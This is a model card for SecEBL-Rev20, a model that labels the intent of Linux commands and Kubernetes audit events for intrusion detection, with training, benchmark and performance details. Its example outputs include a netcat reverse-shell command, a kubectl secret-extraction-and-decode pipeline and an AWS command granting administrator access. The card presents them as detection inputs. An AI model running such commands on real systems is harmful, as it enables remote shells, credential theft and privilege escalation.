SecEBL-Rev20
SecEBL stands for Security Event Behavior Labeler.
SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.
Project repository: github.com/EBWi11/SecEBL
At A Glance
| Area | Current release summary |
|---|---|
| Stable public API | L1 behavior-intent labeling with ranked top_labels. |
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
| Training setup | Alibaba-NLP/gte-modernbert-base, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |
The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.
First-Time User Path
Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:
git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL
git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
pip install -e .
scripts/run_examples.sh
After the script finishes, inspect:
runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json
L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
not an intrusion verdict. L2 is optional and experimental; it runs only when an
L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.
What This Repository Contains
This Hugging Face repository is the model artifact bundle.
| Path | Purpose |
|---|---|
| model.safetensors, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
| semantic_texts.jsonl | Rev20 semantic label texts used by the L1 retrieval path. |
| schema/tags_schema_rev20.json | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
| examples/linux/ | Public subset of the internal Linux final benchmark and matching Rev20 labels. |
| examples/k8s/ | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. |
| examples/manifest.json | Public example subset counts and distribution. |
| rev20_tag_rfc.md | Rev20 behavior-tag labeling RFC and boundary examples. |
| l2_artifacts/logreg.joblib | Experimental L2 logistic-regression session scorer. |
| l2_artifacts/tag_risk_policy.rev20.json | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
| l2_artifacts/train_summary.json | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
| LICENSE, NOTICE | Model license and attribution notices. |
This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.
Output Shape
L1 predictions expose ranked top_labels:
{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}
L1 does not emit behavior_tags and does not apply a user-facing tag-selection
threshold. behavior_tags[] is the field used by training and evaluation label
files. Runtime prediction output is ranked top_labels.
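As a minimal sketch of consuming this output, the snippet below assumes that each line of predictions.jsonl holds one JSON object with the fields shown above. The helper name `top_label_per_event` is illustrative and is not part of the released helper scripts.

```python
import json

def top_label_per_event(jsonl_text):
    """Map observation_id -> (label_id, score) for the best-scoring label."""
    best = {}
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        labels = record.get("top_labels", [])
        if not labels:
            continue
        # top_labels is described as ranked; max() avoids relying on that order.
        top = max(labels, key=lambda item: item["score"])
        best[record["observation_id"]] = (top["label_id"], top["score"])
    return best

# Inline sample copied from the record shown above (one JSON object per line).
sample = json.dumps({
    "observation_id": "event:0",
    "command": "nc -e /bin/sh 203.0.113.10 4444",
    "top_labels": [
        {"label_id": "spawn_reverse_shell", "score": 0.811,
         "axis": "execution_and_process"},
        {"label_id": "connect_external_service", "score": 0.488,
         "axis": "network"},
    ],
})
result = top_label_per_event(sample)
print(result)
```

The helper only reads ranked evidence; it does not apply a selection threshold, which matches the L1 contract described here.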
Why Intent Labels Matter
Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.
SecEBL adds an intermediate representation:
raw security event
-> L1 behavior-intent recognition
-> L2 session reasoning or another downstream detector
-> alert / review / policy
L1 intentionally does not decide that a single event is an intrusion. It
produces explainable behavior evidence such as read_credential_material,
execute_remote_command, create_scheduled_task, grant_cluster_privilege,
or query_service_health.
This is useful for:
- LOTL (living-off-the-land) behavior, where the tool is legitimate but the behavior may be suspicious in context.
- Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
- Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.
Data And Vocabulary
Rev20 is a flat behavior-tag schema.
| Item | Count |
|---|---|
| Top-level behavior groups | 12 |
| Behavior tags | 361 |
Schema groups:
| Group | Tags |
|---|---|
| observation_and_discovery | 51 |
| configuration_and_log_modification | 12 |
| filesystem_and_data | 33 |
| execution_and_process | 28 |
| network | 51 |
| identity_auth_and_secrets | 31 |
| persistence_services_and_storage | 27 |
| kernel_memory_and_tracing | 14 |
| package_build_and_source | 19 |
| database_and_infrastructure_services | 33 |
| containers_and_cloud_native | 34 |
| cloud_control_plane | 28 |
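A quick consistency check on the group counts, written as a small sketch. The dictionary below is transcribed from the schema-group table; it is not read from schema/tags_schema_rev20.json, whose file layout is not described here.

```python
# Per-group tag counts transcribed from the schema-group table.
GROUP_TAG_COUNTS = {
    "observation_and_discovery": 51,
    "configuration_and_log_modification": 12,
    "filesystem_and_data": 33,
    "execution_and_process": 28,
    "network": 51,
    "identity_auth_and_secrets": 31,
    "persistence_services_and_storage": 27,
    "kernel_memory_and_tracing": 14,
    "package_build_and_source": 19,
    "database_and_infrastructure_services": 33,
    "containers_and_cloud_native": 34,
    "cloud_control_plane": 28,
}

group_count = len(GROUP_TAG_COUNTS)
total_tags = sum(GROUP_TAG_COUNTS.values())
print(group_count, total_tags)
```

The totals agree with the 12 groups and 361 tags stated for Rev20.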
The release baseline was trained from internal Rev20 corpora:
| Corpus | Rows | Unique behavior tags | Notes |
|---|---|---|---|
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |
The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.
Training Details
The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.
| Item | Value |
|---|---|
| Base model | Alibaba-NLP/gte-modernbert-base |
| Training objective | MultipleNegativesRankingLoss with hard-negative-aware batches |
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, cuda:0 |
| Epochs | 128 full-pass epochs |
| Batch size | 112 |
| Precision | fp32 |
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
| Runtime | 58,291 seconds, about 16.2 hours |
| Sequence length | 160 tokens |
| Optimizer schedule | learning rate 2e-5, warmup ratio 0.06, 8,156 warmup steps, weight decay 0.01 |
Training data scale:
| Training artifact | Count | Notes |
|---|---|---|
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
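The figures in the two tables above are mutually consistent, which the following sketch checks. It assumes that steps per epoch are the pair count divided by the batch size with the last partial batch kept, and that warmup steps are rounded down; neither rounding rule is stated in the training notes. The 1,766 duplicated pairs are the boundary-upsampling count reported in the hard-negative notes.

```python
import math

combined_rows = 85_277 + 1_008            # Linux rows + K8s AuditLog rows
usable_rows = combined_rows - 3_390       # drop abstain rows
effective_pairs = 117_092 + 1_766         # base pairs + boundary upsampling

batch_size = 112
epochs = 128
warmup_ratio = 0.06

# Assumption: the final partial batch counts as a step.
steps_per_epoch = math.ceil(effective_pairs / batch_size)
total_steps = steps_per_epoch * epochs
# Assumption: warmup steps are truncated to an integer.
warmup_steps = int(total_steps * warmup_ratio)
runtime_hours = 58_291 / 3600

print(combined_rows, usable_rows, effective_pairs)
print(steps_per_epoch, total_steps, warmup_steps, round(runtime_hours, 1))
```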
The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.
Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.
Hard negatives were designed in two layers, complemented by targeted boundary upsampling:
- Schema-level negatives: the dataset builder used schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
- Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.
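To make the role of hard negatives concrete, here is a dependency-free sketch of a multiple-negatives ranking objective: each anchor must score its own positive above every other positive in the batch and above any extra hard negatives. This is an illustration of the general technique, not the SecEBL training code. The toy vectors are invented, and the scale of 20 mirrors the sentence-transformers default because the value used for this release is not stated.

```python
import math

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm

def mnrl_loss(anchors, positives, hard_negatives=(), scale=20.0):
    """Mean cross-entropy over scaled cosine similarities.

    Candidate i (the i-th positive) is the correct class for anchor i;
    all other positives and all hard negatives act as negatives.
    """
    candidates = list(positives) + list(hard_negatives)
    total = 0.0
    for i, anchor in enumerate(anchors):
        logits = [scale * cosine(anchor, c) for c in candidates]
        peak = max(logits)  # subtract the max for numerical stability
        log_sum_exp = peak + math.log(sum(math.exp(x - peak) for x in logits))
        total += log_sum_exp - logits[i]
    return total / len(anchors)

# Toy 2-D "embeddings": two command anchors and their matching label texts.
anchors = [[1.0, 0.0], [0.0, 1.0]]
positives = [[0.9, 0.1], [0.1, 0.9]]
near_miss = [[0.8, 0.3]]  # a label text that sits close to the first anchor

easy = mnrl_loss(anchors, positives)
hard = mnrl_loss(anchors, positives, hard_negatives=near_miss)
print(easy, hard)
```

Adding a nearby negative raises the loss, which is the pressure that pushes semantically adjacent tags apart during training.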
Public Benchmark Subset
This Hugging Face repository includes the same public benchmark examples as the
companion GitHub repository: the Linux benchmark subset under examples/linux/
and normalized Kubernetes AuditLog examples under examples/k8s/.
| Public artifact | Rows | Sessions | Notes |
|---|---|---|---|
| examples/linux/example_sessions.jsonl | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. |
| examples/linux/example_gold.rev20.jsonl | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. |
| examples/k8s/example_sessions.jsonl | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. |
| examples/k8s/example_gold.rev20.jsonl | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. |
Session-level labels use English enums: normal_operation and intrusion.
The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions,
and complete 361-tag coverage.
Evaluation Snapshot
The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.
Evaluation scale:
| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
|---|---|---|---|---|
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |
Retrieval quality:
| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
|---|---|---|---|---|
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |
The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.
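The metric names are not formally defined here, so the sketch below shows one plausible reading: any-hit means at least one gold tag appears in the top k, all-covered means every gold tag appears in the top k, and micro recall@k is the share of all gold-tag instances found in the top k. Excluding rows without gold tags is also an assumption, and "Dynamic exact" is not covered. The rows are toy data.

```python
def retrieval_metrics(rows, k=5):
    """rows: iterable of (gold_tags, ranked_label_ids) pairs."""
    any_hit = all_covered = found = total_gold = labeled = 0
    for gold, ranked in rows:
        gold = set(gold)
        if not gold:
            continue  # assumption: rows without gold tags are excluded
        hits = len(gold & set(ranked[:k]))
        labeled += 1
        any_hit += hits > 0
        all_covered += hits == len(gold)
        found += hits
        total_gold += len(gold)
    return {
        "any_hit": any_hit / labeled,
        "all_covered": all_covered / labeled,
        "micro_recall": found / total_gold,
    }

# Toy rows: (gold tags, ranked predictions).
rows = [
    (["read_credential_material"], ["read_credential_material", "search_credentials"]),
    (["stage_temporary_path", "decode_data"], ["stage_temporary_path", "enumerate_filesystem"]),
    (["query_dns_records"], ["inspect_network_state", "inspect_system_state"]),
    ([], ["inspect_system_state"]),
]
metrics = retrieval_metrics(rows, k=5)
print(metrics)
```

Under this reading, micro recall always falls between all-covered and any-hit on multi-tag data, which matches the ordering of the reported Linux figures.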
Internal Linux benchmark tag cardinality:
| Tags per row | Rows |
|---|---|
| 0 | 705 |
| 1 | 8,829 |
| 2 | 1,567 |
| 3 | 901 |
| 4 | 402 |
| 5 | 139 |
| 6+ | 51 |
Top internal Linux benchmark tags:
| Tag | Count |
|---|---|
| stage_temporary_path | 987 |
| inspect_network_state | 801 |
| stage_hidden_path | 655 |
| inspect_current_identity | 578 |
| read_credential_material | 551 |
| inspect_system_state | 481 |
| inspect_infrastructure_service | 390 |
| query_dns_records | 372 |
| enumerate_filesystem | 365 |
| search_credentials | 315 |
Example Outputs
These examples show the user-facing L1 output style. Scores are cosine retrieval
scores computed with the release prompt profile applied. The public helper
scripts save the top labels in predictions.jsonl.
| Event | Top 3 L1 tags | Note |
|---|---|---|
| nc -e /bin/sh 203.0.113.10 4444 | spawn_reverse_shell 0.811, connect_external_service 0.488, spawn_bind_shell 0.451 | -e is recognized as reverse-shell execution. |
| nc -v 203.0.113.10 443 | connect_external_service 0.732, spawn_reverse_shell 0.503, create_reverse_tunnel 0.412 | Connection intent ranks above shell-spawn intent. |
| cat /root/install.log | read_business_log 0.641, read_system_log 0.431, read_workload_logs 0.385 | Log-read semantics dominate. |
| cat /root/install.conf | read_infrastructure_config 0.620, read_system_config 0.612, read_kernel_parameter 0.336 | Config-read semantics dominate. |
| kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d | read_cluster_secret 0.730, decode_data 0.716, read_credential_material 0.363 | K8s secret extraction and decoding. |
| aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess | grant_cloud_privilege 0.838, modify_cloud_identity_policy 0.535, modify_cloud_identity 0.459 | Cloud privilege escalation semantics. |
| curl -fsS http://127.0.0.1:8080/healthz | query_service_health 0.840, inspect_local_kubernetes_cluster 0.459, inspect_container_runtime 0.383 | Local service health check. |
Runtime Performance
SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.
Current single-card CUDA recommendation:
| Setting | Value |
|---|---|
| Precision | FP16 |
| Attention | SDPA |
| max_seq_length | 160 |
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
| Sorting | sort_by=char |
| Padding | dynamic, no forced pad alignment |
| Output path | GPU tensor output plus GPU top-k |
Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:
| Mode | Throughput |
|---|---|
| Recommended no-cache unique inference, bs224 | mean 5,308.72 unique cmdlines/s |
| Recommended no-cache latency, bs224 | about 0.1884 ms per unique cmdline |
| bs224 repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
| Best quick-sweep point, bs384 | 5,378.45 unique cmdlines/s |
Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
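The cache implementation is not described here, so the following is only a sketch of the idea under a simple assumption: a dictionary keyed on the exact raw event string, with the model called only on a miss. The class name `ExactEventCache` and the stand-in predictor are hypothetical.

```python
class ExactEventCache:
    """Exact-match cache: identical raw events reuse stored top-k results."""

    def __init__(self, predict_fn):
        self._predict_fn = predict_fn  # called only on cache misses
        self._store = {}
        self.hits = 0
        self.misses = 0

    def lookup(self, raw_event):
        if raw_event in self._store:
            self.hits += 1
            return self._store[raw_event]
        self.misses += 1
        result = self._predict_fn(raw_event)
        self._store[raw_event] = result
        return result

calls = []

def fake_predict(raw_event):
    # Stand-in for L1 inference; records each call to show misses only.
    calls.append(raw_event)
    return [{"label_id": "query_service_health", "score": 0.840}]

cache = ExactEventCache(fake_predict)
for event in ["curl -fsS http://127.0.0.1:8080/healthz",
              "nc -v 203.0.113.10 443",
              "curl -fsS http://127.0.0.1:8080/healthz"]:
    cache.lookup(event)
print(cache.hits, cache.misses, len(calls))
```

Because the key is the exact string, any change in arguments or whitespace is a miss, which is why cache throughput and unique-inference throughput are reported separately.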
L2 Artifact
This repository includes an experimental fitted L2 session scorer so the
companion GitHub scripts/run_examples.sh can run the public Linux and K8s L1
examples, plus Linux example-session scoring, when this model directory is used
as MODEL_DIR.
In this release, a session is a sequence of events grouped by session_id.
L1 labels each event independently. L2 scores the whole session by aggregating
cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
and routine-operation context. The L2 output is a session-level verdict such as
intrusion or normal_operation, not a replacement for per-command behavior
tags.
For compatibility with the released L2 artifact, L2 derives its session
features from cached L1 top_labels using an internal selected-tag feature
path. In plain terms, L2 filters the cached ranked labels inside its own feature
builder before session scoring. This does not change L1 prediction output:
users still receive ranked top_labels, not a selected behavior_tags field.
Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.
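The released L2 feature builder is internal, so the sketch below is purely illustrative of the kind of aggregation described: it groups per-event L1 output by session and derives a few hypothetical features (event count, tag diversity, maximum score, axis transitions). The feature names, the `top_n` cutoff, and the pairing of each record with a session id are all assumptions. The session id is used only for grouping, never as a feature.

```python
from collections import defaultdict

def session_features(events, top_n=2):
    """events: ordered iterable of (session_id, l1_record) pairs."""
    grouped = defaultdict(list)
    for session_id, record in events:
        grouped[session_id].append(record)

    features = {}
    for session_id, records in grouped.items():
        tags, scores, axes = set(), [], []
        for record in records:
            kept = record["top_labels"][:top_n]
            tags.update(label["label_id"] for label in kept)
            scores.extend(label["score"] for label in kept)
            if kept:
                axes.append(kept[0]["axis"])  # axis of the top-ranked label
        # Count changes of top-label axis between consecutive events.
        transitions = sum(1 for a, b in zip(axes, axes[1:]) if a != b)
        features[session_id] = {
            "event_count": len(records),
            "tag_diversity": len(tags),
            "max_score": max(scores, default=0.0),
            "axis_transitions": transitions,
        }
    return features

shell = {"label_id": "spawn_reverse_shell", "axis": "execution_and_process"}
conn = {"label_id": "connect_external_service", "axis": "network"}
events = [
    ("s1", {"top_labels": [dict(conn, score=0.732), dict(shell, score=0.503)]}),
    ("s1", {"top_labels": [dict(shell, score=0.811), dict(conn, score=0.488)]}),
]
feats = session_features(events)
print(feats)
```

A fixed-length feature vector like this is the sort of input a logistic-regression session scorer can consume, but the actual released features may differ.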
Internal L2 summary:
| Check | Result |
|---|---|
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
| OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.
Direct SentenceTransformers Loading
You can load the embedding model directly:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("willchen0011/SecEBL")
Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
encode the event, encode or load the Rev20 semantic label texts from
semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k
labels. For normal use, prefer the companion GitHub helpers because they keep
the prompt profile, semantic text loading, top-k output format, and optional L2
feature path aligned with this release.
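The ranking step described above can be sketched without downloading the model. In real use the vectors would come from `model.encode(...)` applied to the event and to the label texts; here they are invented 3-D toy vectors, and the helper name `rank_labels` is illustrative. The prompt profile and the field layout of semantic_texts.jsonl are not reproduced.

```python
import math

def rank_labels(event_vec, label_vecs, k=5):
    """Return the k labels most similar to the event by cosine similarity."""
    def cosine(u, v):
        dot = sum(a * b for a, b in zip(u, v))
        norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
        return dot / norm

    scored = [
        {"label_id": label_id, "score": cosine(event_vec, vec)}
        for label_id, vec in label_vecs.items()
    ]
    scored.sort(key=lambda item: item["score"], reverse=True)
    return scored[:k]

# Toy vectors standing in for encoded label texts and one encoded event.
label_vecs = {
    "spawn_reverse_shell": [0.9, 0.1, 0.0],
    "connect_external_service": [0.5, 0.5, 0.0],
    "read_system_log": [0.0, 0.1, 0.9],
}
event_vec = [1.0, 0.2, 0.0]

top = rank_labels(event_vec, label_vecs, k=2)
print([item["label_id"] for item in top])
```

Label embeddings only need to be computed once per release, so a serving path can cache them and encode just the incoming events.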
Intended Use
- Research and evaluation of security-event behavior labeling.
- Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
- Building session-level risk scoring over SecEBL behavior-label streams.
Out Of Scope
- Standalone verdicting on a single event.
- Authorization or policy-compliance decisions without human validation.
- Monitoring systems you are not authorized to defend.
- Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.
License
The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.
The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0.
Source code, schemas, public examples, public documentation, and helper scripts
in the companion GitHub repository
(EBWi11/SecEBL) are Apache-2.0 unless a
file explicitly states otherwise. Public examples and documentation included in
this Hugging Face repository follow that same companion-repository licensing
unless a file explicitly states otherwise.
Commercial security offerings require a separate written commercial license.